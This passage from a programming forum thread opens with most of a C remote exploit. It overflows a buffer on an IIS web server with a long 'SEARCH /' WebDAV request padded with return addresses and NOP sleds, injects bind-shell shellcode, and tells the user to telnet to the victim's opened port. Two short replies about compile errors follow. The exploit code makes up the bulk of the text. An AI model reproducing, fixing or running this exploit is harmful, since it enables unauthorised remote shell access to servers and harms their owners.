  // Shellcode patching
  port = htons(bport);
  port ^= 0x9999;
 
  if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
        {
          fprintf(stderr, "Binding-port contains null-byte. Use another port.\n Aborted!\n");
          exit(-3);
        }
 
  *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
  *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
  // If the last two items contain any null-bytes, exploit will fail.
  // WARNING: this check is not performed here. Be careful and check it for you

 
  // Resolve hostname
  printf("[*] Resolving hostname ...\n");
  if ((h = gethostbyname(argv[1])) == NULL)
        {
          fprintf(stderr, "%s: unknown hostname\n", argv[1]);
          exit(-4);
        }
 
  bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
        {
          perror("Failed to connect");
          exit(-6);
        }
 
  // Build malicious string...
  printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1],
((ret >> 8) & 0xff), ret & 0xff);

  bzero(buffer, MAXBUF);
  strcpy(buffer, "SEARCH /");
 
  i = strlen(buffer);
  buffer[i] = NOP;         // Align for RET overwrite

  // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill
 
  for (j=i+1; j < i+2150; j+=2)
        *(unsigned short *)&buffer[j] = (unsigned short)ret;

  // The rest is padded with NOP's. RET address should point to this zone!
  for (; j < i+65535-strlen(jumpcode); j++)
        buffer[j] = NOP;

  // Then we skip the body of the HTTP request
  memcpy(&buffer[j], jumpcode, strlen(jumpcode));

  strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
  sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
  strcpy(buffer+strlen(buffer), body);
 
  // This byte is used to mark the beginning of the shellcode
  memset(buffer+strlen(buffer), 0x01, 1);
 
  // And finally, we land into our shellcode
  memset(buffer+strlen(buffer), NOP, 3);
  strcpy(buffer+strlen(buffer), shellcode);
 
  // Send request
  if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
        {
          perror("Failed to send");
          exit(-7);
        }

  printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

  // Receive response
  while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
        rt += r;
  // This code is not bullet-proof. An evil WWW server could return a response
  // and an overflow would occur here. Yes, I'm lazy... :-)
 
  buffer[rt] = '\0';
 
  if (rt > 0)
        printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
  else
    printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
 
  close(s);

}

0
 
GaryFxCommented:
I just tried it on RedHat 6.1 with gcc 2.95.2.  I got no errors, though I did get unrelated warnings when I compiled it with -Wall.  

This suggests that the problem is with your .h include files.  Perhaps you're getting the wrong ones, or you don't have the right one, or some preprocessor symbol is misdefined.  It's difficult to say.  Personally, when I'm faced with such problems, I compile with -E which produces the result of the preprocessor.  This lets me see exactly which files are included and whether any sections are skipped due to preprocessor symbols.  But it is a tedious approach.

Gary
0
 
MtMAuthor Commented:
Well, that just pisses me off ;-)  I'll figure out how to get this stuff compiled sometime.

MtM
0
